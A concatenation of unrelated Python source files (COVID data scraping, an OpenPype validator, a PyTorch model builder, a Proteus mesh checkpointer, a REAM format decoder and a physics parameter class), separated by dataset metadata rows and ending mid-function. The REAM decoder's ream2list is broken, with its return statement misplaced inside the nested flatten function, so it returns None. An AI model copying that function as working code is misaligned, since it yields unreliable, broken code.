country = row.find_all('th')[1].text.replace('\n', '')
if '[' in country:
country = country.split('[')[0]
res = [valor.text.replace('\n', '') for valor in row.find_all('td')[0:3]]
done = False
for i in range(len(res)):
if res[i] == 'No data':
self.results[country] = Pais(country, cases, recov, deaths, '-')
done = True
if ',' in res[i]:
res[i] = res[i].replace(',', '.')
if not done:
done = False
cases, deaths, recov = res
active = int(cases.replace('.', '')) - (int(deaths.replace('.', ''))+int(recov.replace('.', '')))
if active > 999:
active = '{:,}'.format(active).replace(',', '.')
self.results[country] = Pais(country, cases, recov, deaths, active)
self.count()
def getCountry(self, country):
self.load()
return self.results[country]
def getCountryInfo(self, country, info):
self.load()
return self.results[country].get(info)
def getCountryKeys(self):
self.load()
return list(self.results.keys())
def getInfoKeys(self):
return ['infectados', 'fallecidos', 'recuperados', 'activos']
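A quick offline check of the Pais container (no network involved; Globales.load() is what scrapes Wikipedia):

if __name__ == "__main__":
    p = Pais("argentina", infectados="100", recuperados="80",
             fallecidos="5", activos="15")
    print(p)                    # argentina
    print(p.get("infectados"))  # 100
    for registro, valor in p:   # __iter__ yields [register, value] pairs
        print(registro, valor)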
| 23.614286
| 119
| 0.650333
| 436
| 3,306
| 4.816514
| 0.279817
| 0.057619
| 0.033333
| 0.031429
| 0.217619
| 0.152381
| 0.092381
| 0.092381
| 0.049524
| 0.049524
| 0
| 0.006623
| 0.177858
| 3,306
| 140
| 120
| 23.614286
| 0.766004
| 0.038415
| 0
| 0.182796
| 0
| 0
| 0.089764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.021505
| 0.075269
| 0.397849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc738c6ed27c814c11c63a6fb453a793040af60
| 947
|
py
|
Python
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
jonclothcat/OpenPype
|
d1208cbebc0a7f378de0062ccd653295c6399195
|
[
"MIT"
] | 1
|
2022-02-08T15:40:41.000Z
|
2022-02-08T15:40:41.000Z
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
zafrs/OpenPype
|
4b8e7e1ed002fc55b31307efdea70b0feaed474f
|
[
"MIT"
] | 2
|
2022-03-18T01:46:03.000Z
|
2022-03-18T01:46:16.000Z
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
zafrs/OpenPype
|
4b8e7e1ed002fc55b31307efdea70b0feaed474f
|
[
"MIT"
] | null | null | null |
import pyblish.api
from openpype.pipeline import PublishXmlValidationError
from openpype.hosts.tvpaint.api import lib
class RepairStartFrame(pyblish.api.Action):
"""Repair start frame."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
lib.execute_george("tv_startframe 0")
class ValidateStartFrame(pyblish.api.ContextPlugin):
"""Validate start frame being at frame 0."""
label = "Validate Start Frame"
order = pyblish.api.ValidatorOrder
hosts = ["tvpaint"]
actions = [RepairStartFrame]
optional = True
def process(self, context):
start_frame = lib.execute_george("tv_startframe")
if start_frame == 0:
return
raise PublishXmlValidationError(
self,
"Start frame has to be frame 0.",
formatting_data={
"current_start_frame": start_frame
}
)
| 24.921053
| 57
| 0.636748
| 99
| 947
| 5.989899
| 0.505051
| 0.134907
| 0.047218
| 0.070826
| 0.094435
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.269271
| 947
| 37
| 58
| 25.594595
| 0.851156
| 0.061246
| 0
| 0
| 0
| 0
| 0.138952
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.115385
| 0
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc862cde96df508b37a55b7bb12e12b0c12e813
| 3,548
|
py
|
Python
|
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
import torch
import pretrainedmodels as PM
import torch.nn as nn
from .Mobilenet import MobileNetV2
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def Model_builder(configer):
model_name = configer.model['name']
No_classes = configer.dataset_cfg["id_cfg"]["num_classes"]
model_pretrained = configer.model['pretrained']
model_dataparallel = configer.model["DataParallel"]
model_gpu_replica = configer.model["Multi_GPU_replica"]
gpu_ids = configer.train_cfg["gpu"]
if model_name == "Inceptionv3":
model = PM.inceptionv3(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Xception":
model = PM.xception(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "VGG_19":
model = PM.vgg19(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet18":
model = PM.resnet18(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet50":
model = PM.resnet50(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet101":
model = PM.resnet101(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet152":
model = PM.resnet152(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet34":
model = PM.resnet34(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Densenet121":
model = PM.densenet121(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "ResNeXt101-32":
model = PM.resnext101_32x4d(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "ResNeXt101-64":
model = PM.resnext101_64x4d(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "MobilenetV2":
model = MobileNetV2(n_class=No_classes)
else:
raise ImportError("Model Architecture not supported")
# Performing Data Parallelism if configured
if model_dataparallel:
model = torch.nn.DataParallel(model.to(device),device_ids =gpu_ids)
elif model_gpu_replica:
torch.distributed.init_process_group(backend='nccl',world_size=1,rank=1)
model = torch.nn.DistributedDataParallel(model.to(device),device_ids =gpu_ids)
else:
model = model.to(device)
print ('---------- Model Loaded')
return model
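The elif chain above repeats the same three lines per architecture. A table-driven variant (a refactoring sketch, not the original API; it covers only backbone construction, not the DataParallel handling above) keeps the behavior while letting a new model be registered with one dictionary entry:

# Hypothetical refactor: map config names to pretrainedmodels constructors.
PM_CONSTRUCTORS = {
    "Inceptionv3": PM.inceptionv3,
    "Xception": PM.xception,
    "VGG_19": PM.vgg19,
    "Resnet18": PM.resnet18,
    "Resnet34": PM.resnet34,
    "Resnet50": PM.resnet50,
    "Resnet101": PM.resnet101,
    "Resnet152": PM.resnet152,
    "Densenet121": PM.densenet121,
    "ResNeXt101-32": PM.resnext101_32x4d,
    "ResNeXt101-64": PM.resnext101_64x4d,
}

def build_backbone(model_name, no_classes, pretrained):
    if model_name == "MobilenetV2":
        return MobileNetV2(n_class=no_classes)
    try:
        ctor = PM_CONSTRUCTORS[model_name]
    except KeyError:
        raise ImportError("Model Architecture not supported")
    model = ctor(num_classes=1000, pretrained=pretrained)
    # replace the 1000-way head with one sized for the target dataset
    model.last_linear = nn.Linear(model.last_linear.in_features, no_classes)
    return model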
| 37.744681
| 94
| 0.669391
| 441
| 3,548
| 5.14059
| 0.188209
| 0.08734
| 0.145567
| 0.116453
| 0.572122
| 0.572122
| 0.572122
| 0.54742
| 0.54742
| 0.54742
| 0
| 0.039209
| 0.230834
| 3,548
| 94
| 95
| 37.744681
| 0.791499
| 0.011556
| 0
| 0.347826
| 0
| 0
| 0.071491
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.072464
| 0
| 0.101449
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc91781c017fdef90c8f25f225a0256fda47415
| 828
|
py
|
Python
|
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | null | null | null |
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | 3
|
2021-03-15T00:51:37.000Z
|
2021-03-15T01:01:30.000Z
|
examples/main.py
|
marcoaaguiar/erised
|
26a304afb2058f532b07ecde6c6fc85d8864696c
|
[
"MIT"
] | null | null | null |
from erised.proxy import Proxy
class Dog:
def bark(self, loud: bool):
sound = "woof-woof"
if loud:
return sound.upper()
return sound
class Person:
def __init__(self, dog: Dog = None):
self.dog = dog
if __name__ == "__main__":
person = Person()
person.dog = Dog()
proxy = Proxy(obj=person)
# call method remotely
call_future = proxy.dog.bark(loud=True)
print(call_future.result())
# set attributes into remote object, even if they didn't exist originally
proxy.dog.age = 3 # it generates a future that can't be retrieved
# get attributes from remote object
get_future = proxy.dog.age.retrieve()
print(get_future.result())
# if running multiprocessing mode (local=False), terminates child process
proxy.terminate()
| 23.657143
| 77
| 0.649758
| 110
| 828
| 4.745455
| 0.545455
| 0.034483
| 0.038314
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001618
| 0.253623
| 828
| 34
| 78
| 24.352941
| 0.843042
| 0.294686
| 0
| 0
| 0
| 0
| 0.029412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.05
| 0
| 0.35
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddcde07c3cbd2e093fb249312865d2348a9e3b73
| 6,863
|
py
|
Python
|
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | null | null | null |
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 13
|
2018-02-08T23:22:59.000Z
|
2020-12-06T19:40:32.000Z
|
proteus/MeshAdaptPUMI/Checkpoint.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 1
|
2020-02-17T03:25:34.000Z
|
2020-02-17T03:25:34.000Z
|
from __future__ import division
from builtins import str
from builtins import range
import proteus
import sys
import numpy
from proteus import Profiling
#it should probably be associated with the PUMI domain somehow
#The current implementation assumes we're using NS, VOF, LS, RD, MCorr setup with lagging and Backwards Euler.
#Future work on this module should include creating an abstract class from which variations based on the models and numerical accuracy can be created
#Have the dictionary submodels be labeled by physical model names like "twp_navier_stokes"
class Checkpointer:
"This class is meant to handle the checkpointing process for adapted meshes. Information that's needed to be loaded into hotstart needs to be output and then read in to be handled for data reconstruction"
def __init__(self,NSobject,frequency=10):
self.NSobject = NSobject
self.counter = 0
self.frequency = frequency
def checkpoint(self,hotStartTime):
self.transferInfo()
self.saveMesh()
modelListOld=self.EncodeModel(hotStartTime)
#pickling is apparently unsafe so we use json to try storing modelListOld
filename = "checkpointInfo"+str(self.counter)
f = open(filename, 'w')
import json
#json.dump(modelListOld.__dict__,f)
json.dump(modelListOld,f)
f.close()
def transferInfo(self):
self.NSobject.PUMI_transferFields()
def saveMesh(self):
fileName="checkpoint"+str(self.counter)+"_.smb"
self.NSobject.pList[0].domain.PUMIMesh.writeMesh(fileName)
def EncodeModel(self,hotStartTime):
"Grab only necessary components from modelListOld so far consistent only with first-order time integrator"
#def __init__(self,modelListOld,hotStartTime):
modelListOld = self.NSobject.modelListOld
saveModel = {}
saveModel["tCount"] = self.NSobject.tCount+1 #+1 just because of how indexing works in h5 file
saveModel["counter"] = self.counter
saveModel["numModels"] = len(modelListOld)
saveModel["hotStartTime"] = hotStartTime
saveModel["nAdapt"] = self.NSobject.pList[0].domain.PUMIMesh.nAdapt()
saveModel["checkpoint_status"] = ""
if(hasattr(self.NSobject,"tn") and (self.NSobject.systemStepController.t_system_last < self.NSobject.tn)):
saveModel["checkpoint_status"] = "midsystem"
saveModel["tCount"] = self.NSobject.tCount+2 #don't know how to justify this yet but it's what is needed
else:
saveModel["checkpoint_status"] = "endsystem"
saveModel["systemStepController"]=[]
controllerAttribute={}
controllerAttribute["dt_system"]=self.NSobject.systemStepController.dt_system
controllerAttribute["dt_system_fixed"]=self.NSobject.systemStepController.dt_system_fixed
controllerAttribute["t_system_last"]=self.NSobject.systemStepController.t_system_last
controllerAttribute["t_system"]=self.NSobject.systemStepController.t_system
saveModel["systemStepController"].append(controllerAttribute)
saveModel["stepController"]=[]
saveModel["timeIntegration"]=[]
saveModel["shockCapturing"]=[]
saveModel["stabilization"]=[]
for i in range(0,len(modelListOld)):
#step controller
subModel={}
subModel["dt_model"]= modelListOld[i].stepController.dt_model
subModel["t_model"] = modelListOld[i].stepController.t_model
subModel["t_model_last"] = modelListOld[i].stepController.t_model_last
subModel["substeps"]=modelListOld[i].stepController.substeps
saveModel["stepController"].append(subModel)
#time integration
subModel={}
subModel["dt"] = modelListOld[i].levelModelList[0].timeIntegration.dt
subModel["t"] = modelListOld[i].levelModelList[0].timeIntegration.t
if(hasattr(modelListOld[i].levelModelList[0].timeIntegration,'dtLast')):
subModel["dtLast"] = modelListOld[i].levelModelList[0].timeIntegration.dtLast
else:
subModel["dtLast"] = None
saveModel["timeIntegration"].append(subModel)
#shock capturing
subModel={}
if(modelListOld[i].levelModelList[0].shockCapturing is not None):
subModel["nSteps"]=modelListOld[i].levelModelList[0].shockCapturing.nSteps
subModel["nStepsToDelay"]= modelListOld[i].levelModelList[0].shockCapturing.nStepsToDelay
saveModel["shockCapturing"].append(subModel)
#Assuming the 0th model is RANS2P
#stabilization
subModel={}
subModel["nSteps"]= modelListOld[0].levelModelList[0].stabilization.nSteps
saveModel["stabilization"].append(subModel)
return saveModel
def DecodeModel(self,filename):
"create a modelListOld that can interact with the post-adapt restart capabilities"
f = open(filename, 'r')
import json
previousInfo = json.load(f)
f.close()
systemStepController = previousInfo["systemStepController"][0]
self.NSobject.systemStepController.dt_system = systemStepController["dt_system"]
self.NSobject.systemStepController.dt_system_fixed = systemStepController["dt_system_fixed"]
self.NSobject.systemStepController.t_system_last = systemStepController["t_system_last"]
self.NSobject.systemStepController.t_system = systemStepController["t_system"]
numModels = previousInfo["numModels"]
stepController=previousInfo["stepController"]
timeIntegration=previousInfo["timeIntegration"]
shockCapturing=previousInfo["shockCapturing"]
stabilization=previousInfo["stabilization"]
self.counter = previousInfo["counter"]+1
for i in range(0,numModels):
self.NSobject.modelList[i].stepController.dt_model = stepController[i]["dt_model"]
self.NSobject.modelList[i].stepController.t_model = stepController[i]["t_model"]
self.NSobject.modelList[i].stepController.t_model_last = stepController[i]["t_model_last"]
self.NSobject.modelList[i].stepController.substeps = stepController[i]["substeps"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.dt = timeIntegration[i]["dt"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.t = timeIntegration[i]["t"]
self.NSobject.modelList[i].levelModelList[0].timeIntegration.dtLast = timeIntegration[i]["dtLast"]
if(self.NSobject.modelList[i].levelModelList[0].shockCapturing is not None):
self.NSobject.modelList[i].levelModelList[0].shockCapturing.nSteps = shockCapturing[i]["nSteps"]
self.NSobject.modelList[i].levelModelList[0].shockCapturing.nStepsToDelay = shockCapturing[i]["nStepsToDelay"]
self.NSobject.modelList[0].levelModelList[0].stabilization.nSteps = stabilization[0]["nSteps"]
self.NSobject.pList[0].domain.PUMIMesh.set_nAdapt(previousInfo["nAdapt"])
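The class above works because the saved state is reduced to plain dicts and lists before serialization. A self-contained sketch of that round trip (illustrative values only, not real solver state):

import json

state = {"tCount": 3,
         "systemStepController": [{"dt_system": 0.01, "t_system": 0.5}]}
with open("checkpointInfo0", "w") as f:
    json.dump(state, f)
with open("checkpointInfo0") as f:
    restored = json.load(f)
assert restored == state  # JSON keeps dict/list/str/number structure intact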
| 48.673759
| 208
| 0.722862
| 741
| 6,863
| 6.605938
| 0.279352
| 0.075996
| 0.042492
| 0.044944
| 0.338304
| 0.212257
| 0.132176
| 0.039632
| 0
| 0
| 0
| 0.005961
| 0.168877
| 6,863
| 140
| 209
| 49.021429
| 0.852209
| 0.166691
| 0
| 0.093458
| 0
| 0.009346
| 0.168034
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056075
| false
| 0
| 0.084112
| 0
| 0.158879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd0b7f89eb5fdc6f55d6efae895022ea00e5fd2
| 2,634
|
py
|
Python
|
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
ream/decode.py
|
chmlee/ream-python
|
13f46596f59bb411308d1c9070b8d6f8a0afeb31
|
[
"MIT"
] | null | null | null |
"""
REAM: REAM Ain't Markdown
~~~~~~~~~~~~~~~~~~~~~~~~~
This file is part of the ream package
:copyright: Copyright 2020 by Chih-Ming Louis Lee
:license: MIT, see LICENSE for details
"""
import sys
import os
import re
import json
import pandas as pd
from ream.transformer import Ream2Dict
from ream.grammar import REAM_RULE
def ream2dict(input_raw, output_file=None, debug=False, no_comment=False):
"""ream to json"""
if no_comment:
Ream2Dict.no_comment = True
else:
Ream2Dict.no_comment = False
input_tree = REAM_RULE.parse(input_raw)
output_raw = Ream2Dict().transform(input_tree)
if debug:
print(input_tree)
print("====================")
print(input_tree.pretty())
print("====================")
print(output_raw)
print("====================")
if output_file is None:
return output_raw
else:
with open(output_file, 'w') as file:
json.dump(output_raw, file)
print(json.dumps(output_raw, indent=4))
return None
def ream2list(input_raw):
data = ream2dict(input_raw, no_comment=True)
def flatten(d):
parent = []
children = []
for value in d.values():
if type(value) == list:
for subentry in value:
new = flatten(subentry)
if type(new[0]) == list:
for subsub in new:
children.append(subsub)
else:
children.append(new)
else:
parent.append(value)
if children:
result = [ parent + child for child in children ]
else:
result = parent
return result
    return flatten(data)
def ream2csv(input_raw, output_file):
list_raw = ream2list(input_raw)
with open(output_file, 'w') as file:
colname = ",".join([str(x) for x in range(len(list_raw[0]))])
file.write(colname)
file.write('\n')
for entry in list_raw:
file.write(",".join(entry))
file.write('\n')
def ream2df(data):
return pd.DataFrame(ream2list(data))
def main(input_raw, output_file, debug, no_comment):
"""
main function for decoding ream file
"""
output_ext = output_file.split('.')[-1]
# choose conversion function
if output_ext in ['json']:
ream2dict(input_raw, output_file, debug, no_comment)
elif output_ext in ['csv']:
ream2csv(input_raw, output_file)
else:
print("Output file formet not supported")
print("Complete")
| 24.849057
| 74
| 0.566059
| 316
| 2,634
| 4.585443
| 0.335443
| 0.069013
| 0.057971
| 0.062112
| 0.139406
| 0.078675
| 0.078675
| 0
| 0
| 0
| 0
| 0.011432
| 0.302582
| 2,634
| 105
| 75
| 25.085714
| 0.777354
| 0.09795
| 0
| 0.185714
| 0
| 0
| 0.049425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0
| 0.1
| 0.014286
| 0.242857
| 0.128571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddd3332668c74ceeb6666a897a79187f953f120f
| 10,476
|
py
|
Python
|
svirl/vars/params.py
|
microsoft/svirl
|
8d0da6a03ad20315a690a3c65bb8b60c196c3f3d
|
[
"MIT"
] | 6
|
2020-12-21T20:11:13.000Z
|
2022-03-21T07:55:33.000Z
|
svirl/vars/params.py
|
ivan-sadovsky/svirl
|
523abe9fcf2a5e9d192782d7aeb7093c86ef4036
|
[
"MIT"
] | 4
|
2021-07-15T20:12:55.000Z
|
2021-08-07T22:11:18.000Z
|
svirl/vars/params.py
|
ivan-sadovsky/svirl
|
523abe9fcf2a5e9d192782d7aeb7093c86ef4036
|
[
"MIT"
] | 9
|
2020-12-22T06:06:16.000Z
|
2022-03-25T17:26:55.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import numpy as np
import svirl.config as cfg
from svirl.storage import GArray
from . import FixedVortices
class Params(object):
"""This class contains setters and getters for parameters"""
def __init__(self, mesh, vars):
self.mesh = mesh
self.vars = vars
self.fixed_vortices = FixedVortices(self.mesh, self.vars)
self.solveA = False
self.linear_coefficient = cfg.linear_coefficient # epsilon
self.gl_parameter = cfg.gl_parameter # kappa
self.normal_conductivity = cfg.normal_conductivity # sigma
# homogeneous external magnetic field
self._H = cfg.dtype(0.0)
self.homogeneous_external_field_reset = cfg.homogeneous_external_field
# x- and y- components of external vector potential for non-homogeneous external magnetic field
self.ae, self.be = None, None
# external and irregular vector potential
# it should be kept self._vpei = (self.ae, self.be) + (ai, bi)
self._vpei = None
# non-homogeneous external magnetic field
self.external_field = cfg.external_field
self.order_parameter_Langevin_coefficient = cfg.order_parameter_Langevin_coefficient
self.vector_potential_Langevin_coefficient = cfg.vector_potential_Langevin_coefficient
def __del__(self):
pass
@property
def linear_coefficient(self):
""" Sets/gets epsilon (linear coefficient)"""
if self._epsilon.size == 1:
return np.full((cfg.Nx, cfg.Ny), self._epsilon.get_h(), dtype = cfg.dtype)
else:
return self._epsilon.get_h()
@linear_coefficient.setter
def linear_coefficient(self, linear_coefficient):
if callable(linear_coefficient):
            xg, yg = self.mesh.xy_grid  # 'mesh' alone is undefined in this scope
lc = linear_coefficient(xg, yg)
else:
lc = linear_coefficient
if np.isscalar(lc):
lc = lc*np.ones(1)
else:
assert lc.shape == (cfg.Nx, cfg.Ny)
self._epsilon = GArray(like = lc.astype(cfg.dtype))
def linear_coefficient_h(self):
if self._epsilon.size != 1:
return self._epsilon.get_d_obj()
return np.uintp(0)
def linear_coefficient_scalar_h(self):
if self._epsilon.size == 1:
return self._epsilon.get_h()
return cfg.dtype(0.0)
@property
def gl_parameter(self):
""" Sets/gets GL parameter"""
return self._kappa
@gl_parameter.setter
def gl_parameter(self, gl_parameter):
if gl_parameter is None or np.isnan(gl_parameter) or np.isinf(gl_parameter): gl_parameter = np.inf
assert isinstance(gl_parameter, (np.floating, float, np.integer, int)) and (np.isposinf(gl_parameter) or gl_parameter > 0.0)
self._kappa = cfg.dtype(gl_parameter)
        self.solveA = bool(not np.isposinf(self._kappa))  # np.bool alias was removed from numpy
def gl_parameter_squared_h(self):
if self.solveA:
return cfg.dtype(self.gl_parameter**2)
return cfg.dtype(-1.0)
@property
def normal_conductivity(self):
""" Sets/gets normal conductivity"""
return self._sigma
@normal_conductivity.setter
def normal_conductivity(self, normal_conductivity):
assert isinstance(normal_conductivity, (np.floating, float, np.integer, int)) and normal_conductivity > 0.0
self._sigma = cfg.dtype(normal_conductivity)
self._rho = cfg.dtype(1.0/normal_conductivity)
@property
def homogeneous_external_field(self):
"""
Sets/gets homogeneous external field and
does not update vector potential.
"""
return self._H
@homogeneous_external_field.setter
def homogeneous_external_field(self, homogeneous_external_field):
self._H = cfg.dtype(homogeneous_external_field)
def _update_vector_potential(self, homogeneous_external_field, reset):
assert isinstance(homogeneous_external_field, (np.floating, float, np.integer, int))
if reset:
self._H = cfg.dtype(homogeneous_external_field)
# TODO: need a fill method in GArray
# self.a.fill(0.0)
# self.b.fill(0.0)
a, b = self.vars._vp.get_vec_h()
a.fill(0.0)
b.fill(0.0)
self.vars._vp.need_htod_sync()
self.vars._vp.sync()
delta_H = self._H
else:
delta_H = - self._H
self._H = cfg.dtype(homogeneous_external_field)
delta_H += self._H
self.vars._vp.sync()
# TODO: implement GPU version of ab initialization
# Possible set of gauges, A = [g*y*H, (1-g)*x*H, 0] with any g, 0 <= g <= 1
g = 0.5
_, yg = self.mesh.xy_a_grid
xg, _ = self.mesh.xy_b_grid
a, b = self.vars._vp.get_vec_h()
a -= g * (yg - 0.5*cfg.Ly) * delta_H
b += (1.0 - g) * (xg - 0.5*cfg.Lx) * delta_H
self.vars._vp.need_htod_sync()
self.vars._vp.sync()
def _homogeneous_external_field_delta(self, homogeneous_external_field):
self._update_vector_potential(homogeneous_external_field, reset=False)
homogeneous_external_field_delta = property(
fset = _homogeneous_external_field_delta,
doc = """Sets homogeneous external field, H, and adds to the vector
potential deltaA, satisfying curl(deltaA) = deltaH, where
deltaH = H - Hold and Hold is homogeneous external field
before update.""")
def _homogeneous_external_field_reset(self, homogeneous_external_field):
self._update_vector_potential(homogeneous_external_field, reset=True)
homogeneous_external_field_reset = property(
fset = _homogeneous_external_field_reset,
doc = """Sets homogeneous external field, H, and sets vector
potential, A, satisfying curl(A) = H.""")
def _update_gvpei(self):
"""Sets self.gvpei = (self.ae, self.be) + (ai, bi).
To be executed in self.external_vector_potential and self.fixed_vortices setters."""
assert (self.ae is None) == (self.be is None)
ai, bi = None, None
if self.fixed_vortices is not None and self.fixed_vortices._vpi is not None:
ai, bi = self.fixed_vortices._vpi.get_vec_h()
assert (ai is None) == (bi is None)
        vpei = None
        if self.ae is not None:
            if ai is not None:
                vpei = (self.ae + ai, self.be + bi)
            else:
                vpei = (self.ae, self.be)
        elif ai is not None:
            vpei = (ai, bi)
        if vpei is None:
            # nothing left to combine: release any previously stored potential
            # (previously vpei was always a tuple here, so this branch never
            # fired and a (None, None) tuple crashed on vpei[0].shape below)
            if self._vpei is not None:
                self._vpei.free()
                self._vpei = None
        else:
            #TODO: easier if GArray supports like for vector storage
            shapes = [vpei[0].shape, vpei[1].shape]
            self._vpei = GArray(shape = shapes, dtype = cfg.dtype)
            self._vpei.set_vec_h(vpei[0], vpei[1])
            self._vpei.sync()
@property
def external_vector_potential(self):
"""Sets/gets external vector potential."""
assert (self.ae is None) == (self.be is None)
if self.ae is not None:
return self.ae, self.be
return None
@external_vector_potential.setter
def external_vector_potential(self, external_vector_potential):
if external_vector_potential is not None:
Ax, Ay = external_vector_potential
assert (Ax is None) == (Ay is None)
else:
Ax = None
if Ax is not None:
assert Ax.shape == (cfg.Nxa, cfg.Nya)
assert Ay.shape == (cfg.Nxb, cfg.Nyb)
self.ae = Ax
self.be = Ay
else:
self.ae, self.be = None, None
self._update_gvpei()
@property
def external_irregular_vector_potential(self):
""" Sets/gets external irregular vector potential"""
if self._vpei is not None:
return self._vpei.get_vec_h()
return None
def external_irregular_vector_potential_h(self):
if self._vpei is not None:
return self._vpei.get_d_obj()
return np.uintp(0)
@property
def external_field(self):
"""
Sets/gets external (non-homogeneous) magnetic field.
Setter accepts only a number now.
"""
# TODO: return curl(A) for non-homogeneous external_field
A = self.external_vector_potential
if A is not None:
Ax, Ay = A
# TODO: check expression below
return (- np.diff(Ax, axis=1) * cfg.idy
+ np.diff(Ay, axis=0) * cfg.idx)
else:
return None
@external_field.setter
def external_field(self, external_field):
if external_field is not None:
# NOTE: placeholder, accepts only a number now
# TODO: solve equation curl(Aext) = Hext(r) for nonuniform field Hext(r)
# Possible set of gauges, A = [g*y*H, (1-g)*x*H, 0] with any g, 0 <= g <= 1
g = 0.5
_, yg = self.mesh.xy_a_grid
xg, _ = self.mesh.xy_b_grid
Ax = - g * (yg - 0.5*cfg.Ly) * external_field
Ay = (1.0 - g) * (xg - 0.5*cfg.Lx) * external_field
self.external_vector_potential = (Ax, Ay)
else:
self.external_vector_potential = None
@property
def order_parameter_Langevin_coefficient(self):
return self._psi_langevin_c
@order_parameter_Langevin_coefficient.setter
def order_parameter_Langevin_coefficient(self, order_parameter_Langevin_coefficient):
assert isinstance(order_parameter_Langevin_coefficient, (np.floating, float, np.integer, int))
